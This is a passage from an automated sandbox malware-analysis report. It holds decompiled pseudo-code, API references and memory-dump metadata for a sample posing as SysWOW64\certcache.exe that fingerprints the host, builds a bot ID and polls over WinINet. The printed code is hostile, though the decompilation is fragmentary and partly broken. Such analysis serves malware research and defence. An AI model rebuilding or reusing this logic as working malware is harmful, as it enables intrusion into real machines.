				char _v28;
				void* _v32;
				char _v36;
				intOrPtr _v44;
				void* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v76;
				void* _v84;
				void* _v92;
				signed int _t28;
				long _t29;

				_t28 = GetTickCount(); // executed
				if(_t28 <  *0x13c278) {
					L24:
					return _t28;
				} else {
					_t29 =  *0x13c280; // 0x4
					_t28 = _t29 - 1;
					if(_t28 > 3) {
						goto L24;
					} else {
						switch( *((intOrPtr*)(_t28 * 4 +  &M00139094))) {
							case 0:
								 *0x13c280 = 2;
								return _t28;
								goto L25;
							case 1:
								 *0x13c280 = 0;
								__eax = L00139670();
								__eax = __eax;
								if(__eax == 0) {
									 *0x13c280 = 3;
									_pop(__esi);
									return __eax;
								} else {
									if(__eax != 0) {
										goto L24;
									} else {
										__eax = SetEvent( *0x13c29c);
										_pop(__esi);
										return __eax;
									}
								}
								goto L25;
							case 2:
								 *0x13c280 = 0;
								 *0x13c294 = 0x131270;
								 *0x13c298 = 0x131270; // executed
								__eax = L00132310();
								__eax =  *0x13c02c; // 0x1312f8
								 *0x13c26c = __eax;
								__eax =  *0x13c030; // 0x6a
								 *0x13c268 = 0x13c2a8;
								 *0x13c270 = __eax;
								 *0x13c280 = 4;
								_pop(__esi);
								return __eax;
								goto L25;
							case 3:
								__ecx =  &_v28;
								 *0x13c280 = 0; // executed
								__eax = L00138BF0( &_v28); // executed
								__ecx =  &_v36;
								__eax = L00138D90(__eax,  &_v36);
								__eax =  *0x13cbd0; // 0xf71b1512
								_push("216554_6C0D37D2");
								_v32 = __eax;
								_v44 = 0x13c2a8;
								_v44 =  *0x13c130();
								__eax =  *0x13c2a4; // 0x1
								_v52 = __eax;
								do {
									__ecx =  &_v24;
									__esi = 0xdbba0;
									__eax = L00138960(__edx, 0xdbba0);
									__ecx =  &_v16;
									__eax = L0013A7F0(__edx, 0xdbba0);
									__edx =  &_v52;
									__ecx =  &_v84;
									if(L00139FD0(__ebx, __ecx, __edx) != 0) {
										__eax =  &_v92;
										_push( &_v92);
										__eax =  &_v84;
										_push(__eax); // executed
										__eax = L00138560(__eax, __ecx); // executed
										__esp = __esp + 8;
										if(__eax == 0) {
											__eax =  *0x13c298; // 0x131280
											__esi = 0x7530;
											__eax = __eax + 8;
											 *0x13c298 = __eax;
											 *0x13c298 = __eax;
										} else {
											__eax = L001399F0(__eax, __ecx, __edi);
											__ecx = 0;
											__eax = E001388F0(0);
											__ecx = 0;
											__eax = E0013A7A0(0);
											__edx =  &_v76;
											__ecx =  &_v92;
											if(L0013A1D0( &_v92, __edx) != 0) {
												__eax = L00131750(__edi);
												__edx = _v72;
												if(__edx != 0) {
													__ecx = _v76;
													__eax = L00139AE0(__eax, _v76, __edx);
												}
												__eax = L00131750(__edi);
												__edx = _v64;
												if(__edx != 0) {
													__ecx = _v68;
													__eax = L001389D0(__edx, __esi);
													__esi = 0;
												}
												__eax = L00131750(__edi);
												__edx = _v56;
												if(__edx != 0) {
													__ecx = _v60;
													__eax = L0013A860(__edx, __esi);
													__esi = 0;
												}
											}
											GetProcessHeap() = HeapFree(__eax, 0, _v92);
										}
										GetProcessHeap() = HeapFree(__eax, 0, _v84);
									}
									GetProcessHeap() = HeapFree(__eax, 0, _v24);
									GetProcessHeap() = HeapFree(__eax, 0, _v16);
								} while (__esi == 0);
								__eax = GetTickCount(); // executed
								__eax = __eax + __esi;
								 *0x13c280 = 4;
								 *0x13c278 = __eax;
								GetProcessHeap() = HeapFree(__eax, 0, _v32);
								goto L24;
						}
					}
				}
				L25:
			}

0x00138e2a
0x00138e36
0x0013908d
0x00139091
0x00138e3c
0x00138e3c
0x00138e41
0x00138e45
0x00000000
0x00138e4b
0x00138e4b
0x00000000
0x00138e52
0x00138e60
0x00000000
0x00000000
0x00138e63
0x00138e6d
0x00138e72
0x00138e75
0x00138e91
0x00138e9b
0x00138e9f
0x00138e77
0x00138e78
0x00000000
0x00138e7e
0x00138e84
0x00138e8a
0x00138e8e
0x00138e8e
0x00138e78
0x00000000
0x00000000
0x00138ea2
0x00138eac
0x00138eb6
0x00138ec0
0x00138ec5
0x00138eca
0x00138ecf
0x00138ed4
0x00138ede
0x00138ee3
0x00138eed
0x00138ef1
0x00000000
0x00000000
0x00138ef4
0x00138ef8
0x00138f02
0x00138f07
0x00138f0b
0x00138f10
0x00138f15
0x00138f1a
0x00138f1e
0x00138f2c
0x00138f30
0x00138f38
0x00138f40
0x00138f40
0x00138f44
0x00138f49
0x00138f4e
0x00138f52
0x00138f57
0x00138f5b
0x00138f66
0x00138f6c
0x00138f70
0x00138f71
0x00138f75
0x00138f76
0x00138f7b
0x00138f80
0x00139001
0x00139006
0x0013900b
0x0013900e
0x0013901d
0x00138f82
0x00138f82
0x00138f87
0x00138f89
0x00138f8e
0x00138f90
0x00138f95
0x00138f99
0x00138fa4
0x00138fa6
0x00138fab
0x00138fb1
0x00138fb3
0x00138fb7
0x00138fb7
0x00138fbc
0x00138fc1
0x00138fc7
0x00138fc9
0x00138fcd
0x00138fd2
0x00138fd2
0x00138fd4
0x00138fd9
0x00138fdf
0x00138fe1
0x00138fe5
0x00138fea
0x00138fea
0x00138fdf
0x00138ff9
0x00138ff9
0x0013902f
0x0013902f
0x00139042
0x00139055
0x0013905b
0x00139063
0x0013906d
0x0013906f
0x0013907b
0x00139087
0x00000000
0x00000000
0x00138e4b
0x00138e45
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00138E2A
SetEvent.KERNEL32 ref: 00138E84
lstrlen.KERNEL32 ref: 00138F26
HeapFree.KERNEL32(00000000), ref: 00139087

Part of subcall function 001388F0: WaitForSingleObject.KERNEL32(?,00000000), ref: 00138908

Part of subcall function 0013A7A0: WaitForSingleObject.KERNEL32(?,00000000), ref: 0013A7B8
Part of subcall function 0013A7A0: CloseHandle.KERNEL32(?), ref: 0013A7CC
Part of subcall function 0013A7A0: GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,00138F95), ref: 0013A7D5
Part of subcall function 0013A7A0: HeapFree.KERNEL32(00000000,?,000DBBA0), ref: 0013A7DC

GetProcessHeap.KERNEL32(00000000,?), ref: 00138FF2
HeapFree.KERNEL32(00000000), ref: 00138FF9
GetProcessHeap.KERNEL32(00000000,?), ref: 00139028
HeapFree.KERNEL32(00000000), ref: 0013902F
GetProcessHeap.KERNEL32(00000000,?), ref: 0013903B
HeapFree.KERNEL32(00000000), ref: 00139042
GetProcessHeap.KERNEL32(00000000,?), ref: 0013904E
HeapFree.KERNEL32(00000000), ref: 00139055
GetTickCount.KERNEL32 ref: 00139063
GetProcessHeap.KERNEL32(00000000,?), ref: 00139080

Strings

216554_6C0D37D2, xrefs: 00138ED4, 00138F15, 00138F1E

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 00139370, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40
string

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 21%

			E00139370(void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _v8;
				long _v12;
				short _v44;
				intOrPtr _t23;
				void* _t25;
				void* _t26;
				signed int _t29;
				void* _t45;
				int _t48;
				signed int _t55;
				void* _t56;
				void* _t58;
				void* _t66;
				void* _t67;
				void* _t69;
				void* _t70;
				signed int _t71;
				short _t72;
				void* _t74;
				signed short* _t75;
				void* _t77;
				signed short _t80;
				void* _t81;
				void* _t82;
				void* _t83;
				void* _t84;
				short* _t85;
				void* _t86;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t92;
				void* _t93;
				void* _t94;
				void* _t96;

				_t84 = __esi;
				_t81 = __edi;
				_t77 = __edx;
				_t70 = __ecx;
				_t23 =  *0x13c27c; // 0x6c0d37d2
				_t93 = _t92 - 0x28;
				 *0x13c3ac = _t23;
				GetModuleFileNameW(0, "C:\Windows\SysWOW64\certcache.exe", 0x104);
				_t25 = OpenSCManagerW(0, 0, 6); // executed
				if(_t25 != 0) {
					 *0x13c2a4 =  *0x13c2a4 | 0x00000001;
					CloseServiceHandle(_t25);
				}
				_t26 =  *0x13c3ac; // 0x6c0d37d2
				_push(_t84);
				_push(_t81);
				_t85 = 0x13c3b0;
				_v8 = _t26;
				_t82 = RtlAllocateHeap(GetProcessHeap(), 8, 0x15c);
				if(_t82 == 0) {
					_t82 = _v12;
				} else {
					goto 0x14197c;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("lahf");
					asm("int3");
					E00131790(_t70, _t77);
					_t93 = _t93 + 8;
				}
				_t29 =  *0x13c130(_t82, _t66);
				_t71 = _t29;
				_t67 = 2;
				_v12 = _t71;
				do {
					_v8 =  !(_t29 / _t71);
					_t29 = _t82 + _t29 % _t71;
					if(_t29 <= _t82) {
						L11:
						if( *_t29 == 0x2c) {
							goto L12;
						}
					} else {
						while( *_t29 != 0x2c) {
							_t29 = _t29 - 1;
							if(_t29 > _t82) {
								continue;
							} else {
								goto L11;
							}
							goto L13;
						}
						L12:
						_t29 = _t29 + 1;
					}
					L13:
					_t72 =  *_t29;
					if(_t72 != 0) {
						while(_t72 != 0x2c) {
							_t29 = _t29 + 1;
							 *_t85 = _t72;
							_t85 = _t85 + 2;
							_t72 =  *_t29;
							if(_t72 != 0) {
								continue;
							}
							goto L17;
						}
					}
					L17:
					_t71 = _v12;
					_t67 = _t67 - 1;
				} while (_t67 != 0);
				HeapFree(GetProcessHeap(), 0, _t82);
				 *_t85 = 0;
				_push( &_v12);
				_push(0x5f395cc9);
				L00131830(0x131384, 0xc);
				_t94 = _t93 + 8;
				_push("C:\Windows\SysWOW64");
				_push(0);
				_push(0);
				if(( *0x13c2a4 & 0x00000001) == 0) {
					 *0x13c214(0, 0x1c);
					_t80 = 0x14;
					_t74 = 0x131530;
				} else {
					 *0x13c214(0, 0x29); // executed
					_t80 = 4;
					_t74 = 0x131380;
				}
				goto 0x1419a9;
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				L00131830(_t74, _t80);
				_t86 = _v8;
				 *0x13c20c("C:\Windows\SysWOW64", 0x104, _t86, "C:\Windows\SysWOW64", "certcache");
				HeapFree(GetProcessHeap(), 0, _t86);
				_t87 = _v12;
				 *0x13c20c("C:\Windows\SysWOW64\certcache.exe", 0x104, _t87, "C:\Windows\SysWOW64", "certcache");
				_t96 = _t94 + 0x30;
				HeapFree(GetProcessHeap(), 0, _t87);
				_t45 = CreateFileW("C:\Windows\SysWOW64\certcache.exe", 0x80000000, 1, 0, 3, 0, 0); // executed
				_t88 = _t45;
				if(_t88 != 0xffffffff) {
					goto 0x1419c0;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3"); // executed
					_t56 = CreateFileMappingW(); // executed
					_t83 = _t56;
					if(_t83 != 0) {
						goto 0x1419d9;
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3"); // executed
						_t58 = MapViewOfFile(); // executed
						_t69 = _t58;
						if(_t69 != 0) {
							 *0x13cbd0 = RtlComputeCrc32(0, _t69, GetFileSize(_t88, 0));
							UnmapViewOfFile(_t69);
						}
						CloseHandle(_t83);
					}
					CloseHandle(_t88);
				}
				_v12 = 0x10;
				_t48 = GetComputerNameW( &_v44,  &_v12); // executed
				if(_t48 != 0) {
					_t75 =  &_v44;
					if(_v44 != 0) {
						goto 0x1419f0;
						asm("int3");
						do {
							_t55 =  *_t75 & 0x0000ffff;
							if(_t55 < 0x30 || _t55 > 0x39) {
								if(_t55 < 0x61 || _t55 > 0x7a) {
									if(_t55 < 0x41 || _t55 > 0x5a) {
										 *_t75 = _t80;
									}
								}
							}
							_t75 =  &(_t75[1]);
						} while ( *_t75 != 0);
					}
					_t89 = RtlAllocateHeap(GetProcessHeap(), 8, 0xc);
					if(_t89 == 0) {
						_t89 = _v12;
					} else {
						goto 0x141a04;
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("lahf");
						asm("int3");
						E00131790(_t75, _t80);
						_t96 = _t96 + 8;
					}
					 *0x13c1f8("216554_6C0D37D2", 0x104, _t89,  &_v44,  *0x13c3ac);
					_t48 = HeapFree(GetProcessHeap(), 0, _t89);
				}
				goto 0x141a1e;
				return _t48;
			}

0x00139370
0x00139370
0x00139370
0x00139370
0x00139373
0x00139378
0x0013937b
0x0013938c
0x00139398
0x001393a0
0x001393a2
0x001393aa
0x001393aa
0x001393b0
0x001393b5
0x001393b6
0x001393be
0x001393c3
0x001393d3
0x001393d7
0x001393ef
0x001393d9
0x001393d9
0x001393de
0x001393df
0x001393e0
0x001393e1
0x001393e2
0x001393e3
0x001393e4
0x001393e5
0x001393ea
0x001393ea
0x001393f4
0x001393fa
0x001393fc
0x00139401
0x00139404
0x0013940d
0x00139410
0x00139415
0x00139421
0x00139424
0x00000000
0x00000000
0x00139417
0x00139417
0x0013941c
0x0013941f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0013941f
0x00139426
0x00139426
0x00139426
0x00139427
0x00139427
0x0013942b
0x00139430
0x00139439
0x0013943a
0x0013943d
0x00139440
0x00139444
0x00000000
0x00000000
0x00000000
0x00139444
0x00139430
0x00139446
0x00139446
0x00139449
0x00139449
0x00139456
0x00139463
0x0013946e
0x0013946f
0x00139474
0x00139479
0x00139483
0x00139488
0x0013948a
0x0013948c
0x001394a8
0x001394ae
0x001394b3
0x0013948e
0x00139492
0x00139498
0x0013949d
0x0013949d
0x001394b8
0x001394bd
0x001394be
0x001394bf
0x001394c0
0x001394c1
0x001394c6
0x001394de
0x001394f1
0x001394f7
0x0013950f
0x00139515
0x00139522
0x0013953c
0x00139542
0x00139547
0x00139549
0x0013954e
0x0013954f
0x00139550
0x00139551
0x00139552
0x00139553
0x00139554
0x0013955a
0x0013955e
0x00139560
0x00139565
0x00139566
0x00139567
0x00139568
0x00139569
0x0013956f
0x00139573
0x00139589
0x0013958e
0x0013958e
0x00139595
0x00139595
0x0013959c
0x0013959c
0x001395a5
0x001395b1
0x001395ba
0x001395c5
0x001395c8
0x001395ca
0x001395cf
0x001395d0
0x001395d0
0x001395d6
0x001395e0
0x001395ea
0x001395f1
0x001395f1
0x001395ea
0x001395e0
0x001395f4
0x001395f7
0x001395d0
0x0013960e
0x00139612
0x0013962a
0x00139614
0x00139614
0x00139619
0x0013961a
0x0013961b
0x0013961c
0x0013961d
0x0013961e
0x0013961f
0x00139620
0x00139625
0x00139625
0x00139642
0x00139655
0x00139655
0x0013965b
0x00139660

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Windows\SysWOW64\certcache.exe,00000104), ref: 0013938C
OpenSCManagerW.SECHOST(00000000,00000000,00000006), ref: 00139398
CloseServiceHandle.SECHOST(00000000), ref: 001393AA
GetProcessHeap.KERNEL32(00000008,0000015C), ref: 001393C6
RtlAllocateHeap.NTDLL(00000000), ref: 001393CD
lstrlen.KERNEL32(?), ref: 001393F4

Strings

C:\Windows\SysWOW64\certcache.exe, xrefs: 00139385
certcache, xrefs: 001393BE

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 001386C5, Relevance: 13.5, APIs: 9, Instructions: 20
network

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E001386C5(intOrPtr* __edi) {
				void* _t24;
				void* _t26;

				HeapFree(GetProcessHeap(), ??, ??);
				InternetCloseHandle( *(_t26 - 0x30));
				InternetCloseHandle( *(_t26 - 0x34)); // executed
				InternetCloseHandle( *(_t26 - 0x38)); // executed
				HeapFree(GetProcessHeap(), 0, 0);
				HeapFree(GetProcessHeap(), 0, _t24);
				HeapFree(GetProcessHeap(), ??, ??);
				HeapFree(GetProcessHeap(), ??, ??);
				return 0 |  *__edi != 0x00000000;
			}

0x001386cc
0x001386d5
0x001386de
0x001386e7
0x001386f8
0x00138708
0x0013871a
0x0013872c
0x0013873f

APIs

GetProcessHeap.KERNEL32 ref: 001386C5
HeapFree.KERNEL32(00000000), ref: 001386CC
InternetCloseHandle.WININET(?), ref: 001386D5
InternetCloseHandle.WININET(?), ref: 001386DE
InternetCloseHandle.WININET(?), ref: 001386E7
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001386F1
HeapFree.KERNEL32(00000000), ref: 001386F8
GetProcessHeap.KERNEL32(00000000,?), ref: 00138701
HeapFree.KERNEL32(00000000), ref: 00138708

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 00138BFA, Relevance: 12.1, APIs: 8, Instructions: 91
string

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00138C28
lstrlenW.KERNEL32(?), ref: 00138C35
lstrlenW.KERNEL32(00000004), ref: 00138C84
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00138CA0
RtlAllocateHeap.NTDLL(00000000), ref: 00138CA7
lstrcmpiW.KERNEL32(00000004,?), ref: 00138CC5
lstrcpyW.KERNEL32(00000000,00000004), ref: 00138CDA
lstrlenW.KERNEL32(00000004), ref: 00138CE4

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 001385DF, Relevance: 10.5, APIs: 7, Instructions: 47

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 38%

			E001385DF(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi, void* __eflags) {
				signed char* _t28;
				void* _t30;
				void* _t41;
				void _t49;
				intOrPtr _t52;
				void* _t53;
				signed char* _t56;
				void* _t58;
				intOrPtr* _t64;
				void* _t66;
				void* _t67;
				void* _t69;

				_t64 = __edi;
				_t53 = __ebx;
				asm("lahf");
				asm("int3");
				L00131830(__ecx, __edx);
				_t56 =  *0x13c298; // 0x131280
				_t66 =  *(_t69 + 8);
				_t2 =  &(_t56[1]); // 0xa8d4059f
				_t3 =  &(_t56[2]); // 0x1ba8d405
				_t4 =  &(_t56[3]); // 0x1ba8d4
				 *0x13c20c(_t69 - 0xb8, 0x40, _t66,  *_t4 & 0x000000ff,  *_t3 & 0x000000ff,  *_t2 & 0x000000ff,  *_t56 & 0x000000ff);
				HeapFree(GetProcessHeap(), 0, _t66);
				_t28 =  *0x13c298; // 0x131280
				_t61 = _t69 - 0xb8;
				_push(_t56);
				_t57 = _t69 - 0x38;
				_t8 =  &(_t28[4]); // 0x1ba8
				_push( *_t8 & 0x0000ffff); // executed
				_t30 = L00131C50(_t69 - 0x38, _t69 - 0xb8, _t64); // executed
				_t67 =  *(_t69 - 8);
				if(_t30 != 0) {
					goto 0x14165c;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3"); // executed
					_t41 = L00131D40(_t57); // executed
					if(_t41 != 0) {
						goto 0x141674;
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						if(L00131E80(_t41, _t57, _t61) != 0) {
							goto 0x14168c;
							asm("int3");
							asm("int3");
							if(L00132560(_t61, _t64) != 0) {
								_t58 =  *(_t69 - 0x10);
								_t49 =  *_t58;
								 *_t53 = _t49;
								if(_t49 < 0x4000000) {
									_push(_t53);
									_t52 = L00138500(_t58 + 4,  *((intOrPtr*)(_t69 - 0xc)) - 4, _t64);
									_t58 =  *(_t69 - 0x10);
									 *_t64 = _t52;
								}
								HeapFree(GetProcessHeap(), 0, _t58);
							}
							HeapFree(GetProcessHeap(), ??, ??);
						}
						InternetCloseHandle( *(_t69 - 0x30));
					}
					InternetCloseHandle( *(_t69 - 0x34)); // executed
					InternetCloseHandle( *(_t69 - 0x38)); // executed
				}
				HeapFree(GetProcessHeap(), 0, 0);
				HeapFree(GetProcessHeap(), 0, _t67);
				HeapFree(GetProcessHeap(), ??, ??);
				HeapFree(GetProcessHeap(), ??, ??);
				return 0 |  *_t64 != 0x00000000;
			}

0x001385df
0x001385df
0x001385df
0x001385e0
0x001385e1
0x001385e6
0x001385ec
0x001385f3
0x001385f8
0x001385fd
0x0013860c
0x0013861f
0x00138625
0x0013862a
0x00138630
0x00138631
0x00138634
0x00138638
0x00138639
0x0013863e
0x00138646
0x0013864c
0x00138651
0x00138652
0x00138653
0x00138654
0x00138655
0x00138656
0x00138660
0x00138662
0x00138667
0x00138668
0x00138669
0x0013866a
0x0013866b
0x00138676
0x00138678
0x0013867d
0x0013867e
0x00138689
0x0013868b
0x0013868e
0x00138690
0x00138697
0x0013869f
0x001386a3
0x001386a8
0x001386ae
0x001386ae
0x001386ba
0x001386ba
0x001386cc
0x001386cc
0x001386d5
0x001386d5
0x001386de
0x001386e7
0x001386e7
0x001386f8
0x00138708
0x0013871a
0x0013872c
0x0013873f

APIs

_snwprintf.NTDLL ref: 0013860C
GetProcessHeap.KERNEL32(00000000,?), ref: 00138618
HeapFree.KERNEL32(00000000), ref: 0013861F
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001386F1
HeapFree.KERNEL32(00000000), ref: 001386F8
GetProcessHeap.KERNEL32(00000000,?), ref: 00138701
HeapFree.KERNEL32(00000000), ref: 00138708

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 00139569, Relevance: 10.5, APIs: 7, Instructions: 31
file

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 34%

			E00139569(signed short __edx, void* __edi, void* __esi) {
				void* _t8;
				int _t13;
				signed int _t20;
				void* _t24;
				signed short* _t26;
				signed short _t27;
				void* _t28;
				void* _t29;
				void* _t30;
				void* _t31;
				void* _t32;

				_t29 = __esi;
				_t28 = __edi;
				_t27 = __edx;
				_t8 = MapViewOfFile(??, ??, ??, ??, ??); // executed
				_t24 = _t8;
				if(_t24 != 0) {
					 *0x13cbd0 = RtlComputeCrc32(0, _t24, GetFileSize(__esi, 0));
					UnmapViewOfFile(_t24);
				}
				CloseHandle(_t28);
				CloseHandle(_t29);
				 *(_t31 - 8) = 0x10;
				_t13 = GetComputerNameW(_t31 - 0x28, _t31 - 8); // executed
				if(_t13 != 0) {
					_t26 = _t31 - 0x28;
					if( *(_t31 - 0x28) != 0) {
						goto 0x1419f0;
						asm("int3");
						do {
							_t20 =  *_t26 & 0x0000ffff;
							if(_t20 < 0x30 || _t20 > 0x39) {
								if(_t20 < 0x61 || _t20 > 0x7a) {
									if(_t20 < 0x41 || _t20 > 0x5a) {
										 *_t26 = _t27;
									}
								}
							}
							_t26 =  &(_t26[1]);
						} while ( *_t26 != 0);
					}
					_t30 = RtlAllocateHeap(GetProcessHeap(), 8, 0xc);
					if(_t30 == 0) {
						_t30 =  *(_t31 - 8);
					} else {
						goto 0x141a04;
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("lahf");
						asm("int3");
						E00131790(_t26, _t27);
						_t32 = _t32 + 8;
					}
					 *0x13c1f8("216554_6C0D37D2", 0x104, _t30, _t31 - 0x28,  *0x13c3ac);
					_t13 = HeapFree(GetProcessHeap(), 0, _t30);
				}
				goto 0x141a1e;
				return _t13;
			}

0x00139569
0x00139569
0x00139569
0x00139569
0x0013956f
0x00139573
0x00139589
0x0013958e
0x0013958e
0x00139595
0x0013959c
0x001395a5
0x001395b1
0x001395ba
0x001395c5
0x001395c8
0x001395ca
0x001395cf
0x001395d0
0x001395d0
0x001395d6
0x001395e0
0x001395ea
0x001395f1
0x001395f1
0x001395ea
0x001395e0
0x001395f4
0x001395f7
0x001395d0
0x0013960e
0x00139612
0x0013962a
0x00139614
0x00139614
0x00139619
0x0013961a
0x0013961b
0x0013961c
0x0013961d
0x0013961e
0x0013961f
0x00139620
0x00139625
0x00139625
0x00139642
0x00139655
0x00139655
0x0013965b
0x00139660

APIs

MapViewOfFile.KERNELBASE ref: 00139569
GetFileSize.KERNEL32(?,00000000), ref: 00139578
RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 00139582
UnmapViewOfFile.KERNEL32(00000000,?,00000000), ref: 0013958E
CloseHandle.KERNEL32 ref: 00139595
CloseHandle.KERNEL32 ref: 0013959C
GetComputerNameW.KERNEL32(?,?), ref: 001395B1
GetProcessHeap.KERNEL32(00000008,0000000C), ref: 00139601
RtlAllocateHeap.NTDLL(00000000), ref: 00139608
_snprintf.NTDLL ref: 00139642
GetProcessHeap.KERNEL32(00000000,00000010), ref: 0013964E
HeapFree.KERNEL32(00000000), ref: 00139655

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 0013866C, Relevance: 10.5, APIs: 7, Instructions: 22
network

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 59%

			E0013866C(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi) {
				void* _t10;
				void _t28;
				intOrPtr _t31;
				void* _t32;
				void* _t35;
				intOrPtr* _t40;
				void* _t42;
				void* _t44;

				_t40 = __edi;
				_t32 = __ebx;
				if(L00131E80(_t10, __ecx, __edx) != 0) {
					goto 0x14168c;
					asm("int3");
					asm("int3");
					if(L00132560(__edx, _t40) != 0) {
						_t35 =  *(_t44 - 0x10);
						_t28 =  *_t35;
						 *_t32 = _t28;
						if(_t28 < 0x4000000) {
							_push(_t32);
							_t31 = L00138500(_t35 + 4,  *((intOrPtr*)(_t44 - 0xc)) - 4, _t40);
							_t35 =  *(_t44 - 0x10);
							 *_t40 = _t31;
						}
						HeapFree(GetProcessHeap(), 0, _t35);
					}
					HeapFree(GetProcessHeap(), ??, ??);
				}
				InternetCloseHandle( *(_t44 - 0x30));
				InternetCloseHandle( *(_t44 - 0x34)); // executed
				InternetCloseHandle( *(_t44 - 0x38)); // executed
				HeapFree(GetProcessHeap(), 0, 0);
				HeapFree(GetProcessHeap(), 0, _t42);
				HeapFree(GetProcessHeap(), ??, ??);
				HeapFree(GetProcessHeap(), ??, ??);
				return 0 |  *_t40 != 0x00000000;
			}

0x0013866c
0x0013866c
0x00138676
0x00138678
0x0013867d
0x0013867e
0x00138689
0x0013868b
0x0013868e
0x00138690
0x00138697
0x0013869f
0x001386a3
0x001386a8
0x001386ae
0x001386ae
0x001386ba
0x001386ba
0x001386cc
0x001386cc
0x001386d5
0x001386de
0x001386e7
0x001386f8
0x00138708
0x0013871a
0x0013872c
0x0013873f

APIs

InternetCloseHandle.WININET(?), ref: 001386D5
InternetCloseHandle.WININET(?), ref: 001386DE
InternetCloseHandle.WININET(?), ref: 001386E7
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001386F1
HeapFree.KERNEL32(00000000), ref: 001386F8
GetProcessHeap.KERNEL32(00000000,?), ref: 00138701
HeapFree.KERNEL32(00000000), ref: 00138708

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 00131670, Relevance: 9.0, APIs: 6, Instructions: 33

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00131670(signed int __eax, void* __ebx, void* __esi) {
				signed int _t38;

				_t38 = __eax %  *(__esi + __ebx - 0x17);
			}

0x00131670

APIs

CreateMutexW.KERNELBASE(?), ref: 0013167E
CloseHandle.KERNEL32 ref: 0013168B
GetLastError.KERNEL32 ref: 00131699
SetEvent.KERNEL32 ref: 001316A7
CloseHandle.KERNEL32 ref: 001316AE
CloseHandle.KERNEL32(00000000), ref: 001316B5

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

